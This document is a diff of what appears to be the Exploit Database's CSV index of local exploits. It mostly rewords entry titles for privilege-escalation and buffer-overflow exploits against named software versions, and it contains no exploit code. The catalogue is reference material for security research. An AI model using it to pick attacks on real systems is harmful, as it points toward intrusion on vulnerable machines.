1347,exploits/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",local,qnx, 1360,exploits/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,local,solaris, -1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation",2005-12-30,alert7,local,linux, +1397,exploits/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation",2005-12-30,alert7,local,linux, 1402,exploits/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Local Privilege Escalation",2006-01-03,prdelka,local,sco, 1403,exploits/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (1)",2006-01-04,K4P0,local,windows, 1404,exploits/windows/local/1404.c,"WinRAR 3.30 - 'Filename' Local Buffer Overflow (2)",2006-01-04,c0d3r,local,windows, @@ -6073,7 +6075,7 @@ id,file,description,date,author,type,platform,port 1911,exploits/windows/local/1911.c,"Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (PoC) (MS06-030)",2006-06-14,"Ruben Santamarta",local,windows, 1917,exploits/windows/local/1917.pl,"Pico Zip 4.01 - 'Filename' Local Buffer Overflow",2006-06-15,c0rrupt,local,windows, 1924,exploits/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,local,multiple, -1944,exploits/windows/local/1944.c,"Microsoft Excel - Remote Code Execution",2006-06-22,"naveed afzal",local,windows, +1944,exploits/windows/local/1944.c,"Microsoft Excel - Code Execution",2006-06-22,"naveed afzal",local,windows, 1958,exploits/windows/local/1958.pl,"Microsoft Excel 2003 - Hlink Stack Buffer Overflow (SEH)",2006-06-27,FistFuXXer,local,windows, 1962,exploits/osx/local/1962.pl,"Apple Mac OSX 10.4.6 (x86) - 'launchd' Local Format String",2006-06-28,"Kevin Finisterre",local,osx, 1973,exploits/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",local,osx, @@ -6125,12 +6127,12 @@ id,file,description,date,author,type,platform,port 2569,exploits/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",local,solaris, 2580,exploits/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation",2006-10-16,"Kevin Finisterre",local,osx, 2581,exploits/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",local,linux, -2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, -2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2633,exploits/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Local Stack Overflow / Local Privilege Escalation",2006-10-24,prdelka,local,hp-ux, +2634,exploits/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2635,exploits/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2636,exploits/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,local,hp-ux, 2641,exploits/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",local,solaris, -2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,local,windows, +2676,exploits/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation",2006-10-29,Nanika,local,windows, 2737,exploits/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, 2738,exploits/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",local,osx, 2788,exploits/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Local Privilege Escalation",2006-11-15,"Kevin Finisterre",local,osx, @@ -6167,10 +6169,10 @@ id,file,description,date,author,type,platform,port 3273,exploits/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak",2007-02-06,bunker,local,tru64, 3330,exploits/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,local,linux, 3333,exploits/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,local,linux, -3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,local,windows, +3342,exploits/windows/local/3342.c,"News Rover 12.1 Rev 1 - Stack Overflow (1)",2007-02-20,Marsu,local,windows, 3349,exploits/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,local,windows, 3356,exploits/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation",2007-02-21,"Jon Hart",local,linux, -3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",local,windows, +3369,exploits/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Stack Overflow (2)",2007-02-24,"Umesh Wanve",local,windows, 3383,exploits/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Privilege Escalation",2007-02-28,"Don Bailey",local,plan9, 3384,exploits/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",local,linux, 3386,exploits/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Local Privilege Escalation",2007-02-28,"Kevin Finisterre",local,osx, @@ -6198,7 +6200,7 @@ id,file,description,date,author,type,platform,port 3571,exploits/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",local,linux, 3572,exploits/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",local,linux, 3576,exploits/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,local,windows, -3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation",2007-03-26,harry,local,bsd, +3578,exploits/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation",2007-03-26,harry,local,bsd, 3587,exploits/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",local,linux, 3593,exploits/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",local,windows, 3595,exploits/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",local,linux, @@ -6290,7 +6292,7 @@ id,file,description,date,author,type,platform,port 4749,exploits/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow",2007-12-18,devcode,local,windows, 4751,exploits/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Local Stack Overflow",2007-12-18,"SYS 49152",local,windows, 4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux, -4759,exploits/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",local,osx, +4759,exploits/osx/local/4759.c,"Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow",2007-12-19,"Subreption LLC.",local,osx, 4839,exploits/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Local Stack Overflow",2008-01-05,Trancek,local,windows, 4892,exploits/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,local,windows, 4938,exploits/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,local,windows, @@ -6344,7 +6346,7 @@ id,file,description,date,author,type,platform,port 6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local (PoC)",2008-10-08,"Cesar Cerrudo",local,windows, 6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows, 6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows, -6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",local,windows, +6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows, 6825,exploits/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Local Buffer Overflow (SEH)",2008-10-23,"Guido Landi",local,windows, 6831,exploits/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",local,windows, 6851,exploits/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation",2008-10-27,gat3way,local,linux, @@ -6671,7 +6673,7 @@ id,file,description,date,author,type,platform,port 9988,exploits/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,local,windows, 9990,exploits/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",local,multiple, 9991,exploits/windows/local/9991.txt,"Alleycode 2.21 - Local Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",local,windows, -10009,exploits/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",local,windows, +10009,exploits/windows/local/10009.txt,"Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",local,windows, 10010,exploits/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,local,windows, 10018,exploits/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4)",2009-11-12,"Earl Chew",local,linux, 10038,exploits/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",local,linux, @@ -6689,7 +6691,7 @@ id,file,description,date,author,type,platform,port 10213,exploits/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",local,windows, 10226,exploits/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Local Buffer Overflow",2009-11-25,Rick2600,local,windows, 10240,exploits/windows/local/10240.py,"Millenium MP3 Studio 2.0 - 'pls' Local Buffer Overflow",2009-11-28,Molotov,local,windows, -10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",local,windows, +10244,exploits/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Buffer Overflows",2009-11-28,"Christophe Devine",local,windows, 10255,exploits/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Local Privilege Escalation",2009-11-30,kingcope,local,bsd, 10264,exploits/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, 10265,exploits/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor",2009-12-01,"Andrea Purificato",local,multiple, @@ -6701,7 +6703,7 @@ id,file,description,date,author,type,platform,port 10295,exploits/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",local,windows, 10296,exploits/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",local,php, 10298,exploits/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow",2009-12-04,"fl0 fl0w",local,windows, -10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,local,linux, +10313,exploits/linux/local/10313.c,"Libmodplug - 's3m' Buffer Overflow",2008-02-25,dummy,local,linux, 10319,exploits/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,local,windows, 10320,exploits/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Local Buffer Overflow",2009-12-05,Encrypt3d.M!nd,local,windows, 10321,exploits/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,local,windows, @@ -6775,7 +6777,7 @@ id,file,description,date,author,type,platform,port 11205,exploits/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",local,windows, 11208,exploits/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Local Stack Overflow",2010-01-21,cr4wl3r,local,windows, 11219,exploits/windows/local/11219.pl,"SOMPL Player 1.0 - Local Buffer Overflow",2010-01-22,Rick2600,local,windows, -11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,local,windows, +11229,exploits/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin)",2010-01-22,Stack,local,windows, 11232,exploits/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM",2010-01-22,mu-b,local,windows, 11255,exploits/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Local Stack Overflow",2010-01-25,Dz_attacker,local,windows, 11256,exploits/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,local,windows, @@ -6846,7 +6848,7 @@ id,file,description,date,author,type,platform,port 12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows, 12293,exploits/windows/local/12293.py,"TweakFS 1.0 - FSX Edition Stack Buffer Overflow",2010-04-19,corelanc0d3r,local,windows, 12326,exploits/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Local Stack Buffer Overflow",2010-04-21,corelanc0d3r,local,windows, -12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,local,windows, +12342,exploits/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC)",2010-04-22,LiquidWorm,local,windows, 12368,exploits/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' File (SEH)",2010-04-24,"TecR0c & Sud0",local,windows, 12379,exploits/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Local Stack Buffer Overflow (PoC)",2010-04-25,mr_me,local,windows, 12388,exploits/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Local Buffer Overflow (Metasploit)",2010-04-25,blake,local,windows, @@ -6990,7 +6992,7 @@ id,file,description,date,author,type,platform,port 14814,exploits/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation",2010-08-27,"Jon Oberheide",local,linux, 14830,exploits/linux/local/14830.py,"Nginx 0.6.38 - Heap Corruption",2010-08-29,"Aaron Conole",local,linux, 14831,exploits/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",local,windows, -14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,local,windows, +14944,exploits/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' Local Stack Overflow",2010-09-08,Abysssec,local,windows, 14966,exploits/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,local,windows, 14959,exploits/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",local,windows, 14961,exploits/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Local Overflow (SEH)",2010-09-09,"Abhishek Lyall",local,win_x86, @@ -7148,7 +7150,7 @@ id,file,description,date,author,type,platform,port 16645,exploits/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, 16646,exploits/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,local,windows, 16648,exploits/windows/local/16648.rb,"Microsoft HTML Help Workshop 4.74 - '.hhp' Cotent Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, -16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, +16651,exploits/windows/local/16651.rb,"AOL 9.5 - 'Phobos.Playlist Import()' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows, 16652,exploits/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,local,windows, 16653,exploits/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,local,windows, 16654,exploits/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,local,windows, @@ -7309,10 +7311,10 @@ id,file,description,date,author,type,platform,port 18147,exploits/linux/local/18147.c,"bzexe (bzip2) - Race Condition",2011-11-23,vladz,local,linux, 18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows, 18176,exploits/windows/local/18176.py,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)",2011-11-30,ryujin,local,windows, -18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,local,windows, +18178,exploits/windows/local/18178.rb,"CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (SEH) (Metasploit)",2011-11-30,Rh0,local,windows, 18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",local,windows, 18186,exploits/windows/local/18186.rb,"StoryBoard Quick 6 - Local Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",local,windows, -18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,local,windows, +18195,exploits/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (Metasploit)",2011-12-03,Metasploit,local,windows, 18201,exploits/windows/local/18201.txt,"SopCast 3.4.7 - 'Diagnose.exe' Improper Permissions",2011-12-05,LiquidWorm,local,windows, 18228,exploits/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,local,linux, 18258,exploits/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",local,windows, @@ -7352,7 +7354,7 @@ id,file,description,date,author,type,platform,port 18862,exploits/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,local,windows, 18869,exploits/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,local,windows, 18892,exploits/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Local Buffer Overflow",2012-05-17,"saurabh sharma",local,windows, -18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,local,windows, +18905,exploits/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit)",2012-05-21,Metasploit,local,windows, 18914,exploits/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,local,windows, 18917,exploits/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",local,linux, 18923,exploits/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,local,windows, @@ -7383,7 +7385,7 @@ id,file,description,date,author,type,platform,port 19122,exploits/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Local Privilege Escalation",1998-07-13,"Richard Thomas",local,linux, 19125,exploits/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",local,linux, 19126,exploits/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",local,solaris, -19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,local,solaris, +19128,exploits/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Local Privilege Escalation",1998-10-23,UNYUN,local,solaris, 19138,exploits/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",local,windows, 19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple, 19142,exploits/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",local,linux, @@ -7397,7 +7399,7 @@ id,file,description,date,author,type,platform,port 19163,exploits/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Local Privilege Escalation",1998-07-20,Loneguard,local,irix, 19167,exploits/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Local Privilege Escalation",1999-02-04,Marc,local,windows, 19168,exploits/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",local,unix, -19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,local,unix, +19172,exploits/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Local Privilege Escalation (1)",1997-04-26,cesaro,local,unix, 19173,exploits/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Local Privilege Escalation (2)",1997-04-26,BeastMaster,local,unix, 19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,local,windows, 19176,exploits/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Local Buffer Overflow (Metasploit)",2012-06-15,Metasploit,local,windows, @@ -7406,9 +7408,9 @@ id,file,description,date,author,type,platform,port 19196,exploits/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",local,windows, 19198,exploits/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,local,windows, 19199,exploits/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Local Privilege Escalation",1997-11-26,anonymous,local,solaris, -19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,local,unix, -19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)",1997-08-25,jGgM,local,unix, -19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,local,unix, +19200,exploits/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (1)",1997-08-25,bloodmask,local,unix, +19201,exploits/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (2)",1997-08-25,jGgM,local,unix, +19202,exploits/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (3)",1997-08-25,jGgM,local,unix, 19203,exploits/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Local Privilege Escalation",1996-12-04,"Roger Espel Llima",local,unix, 19205,exploits/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Local Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,local,solaris, 19206,exploits/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Local Buffer Overflow",1999-05-11,"kim yong-jun",local,solaris, @@ -7432,7 +7434,7 @@ id,file,description,date,author,type,platform,port 19244,exploits/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",local,osx, 19249,exploits/linux/local/19249.c,"Xcmail 0.99.6 - Local Buffer Overflow",1999-03-02,Arthur,local,linux, 19401,exploits/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",local,windows, -19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,local,linux, +19254,exploits/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Local Privilege Escalation",1999-03-04,xnec,local,linux, 19255,exploits/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",local,linux, 19256,exploits/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,local,linux, 19257,exploits/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,local,linux, @@ -7497,7 +7499,6 @@ id,file,description,date,author,type,platform,port 19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 